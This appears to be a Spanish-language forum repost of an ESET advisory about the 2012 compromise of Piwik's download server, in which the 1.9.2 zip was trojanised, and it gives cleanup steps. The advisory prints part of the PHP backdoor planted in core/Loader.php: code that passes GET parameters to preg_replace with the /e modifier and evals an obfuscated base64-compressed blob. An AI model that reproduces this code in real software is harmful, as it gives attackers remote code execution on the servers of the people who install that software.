Servidor de Piwik vulnerado y utilizado para propagar código malicioso

El servidor web de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta fue vulnerado el día 26 de Noviembre por un atacante. El ciberdelincuente modificó el archivo zip disponible para la descarga por parte de los usuarios correspondiente a la versión 1.9.2, agregando código malicioso en el interior de dicho archivo.

Piwik es una herramienta open source que permite recolectar estadísticas sobre un servidor web. Además posee funcionalidades tales como la generación de reportes detallados sobre los visitantes que recibe un sitio web, realización de campañas de marketing, entre otras.

Aparentemente, y según el propio No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, el atacante habría comprometido el servidor por una vulnerabilidad en un plugin de WordPress.

Luego del compromiso, el archivo descargable se mantuvo con la modificación del código malicioso durante algunas horas, por lo que los usuarios que hayan descargado el software durante ese período obtuvieron una versión maliciosa del mismo. Específicamente, el archivo modificado fue Loader.php ubicado dentro de la carpeta piwik/core/. A continuación se adjunta parte del código malicioso:

<?php Error_Reporting(0);       if(isset($_GET['g']) && isset($_GET['s'])) {
preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKat

Según información del propio No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, el código malicioso insertado corresponde a un backdoor que permitiría al atacante ejecutar cualquier función válida que pueda ejecutarse mediante eval().

En el caso de que se haya instalado la versión modificada es recomendable seguir los siguientes pasos para solucionar el problema:

• Realizar una copia de piwik/config/config.ini.php.
• Borrar el directorio completo de piwik/.
• Descargar la última versión de Piwik (el código malicioso ya fue removido).
• Descomprimir el archivo descargado y situarlo en el servidor.
• Copiar el archivo de configuración config.ini.php previamente respaldado en el directorio /piwik/config/.
• En esta instancia, Piwik debería ejecutarse correctamente con la configuración anterior.

Cabe destacar que ningún tipo de información correspondiente a los usuarios de este software ha sido extraída del servidor vulnerado debido a que el mismo no guarda información correspondiente a sus usuarios.

El compromiso de servidores web por parte de los ciberdelincuentes tiene distintas motivaciones. En este caso fue la modificación de parte del software disponible para infectar a aquellos usuarios que descargan el mismo.

Se recomienda a todos los usuarios que naveguen en la web estar en alerta, tener cuidado y revisar siempre sus descargas. Todo sistema puede ser vulnerado, incluso cuando menos lo pensamos.

Saludos!

Fuente: Laboratorios ESET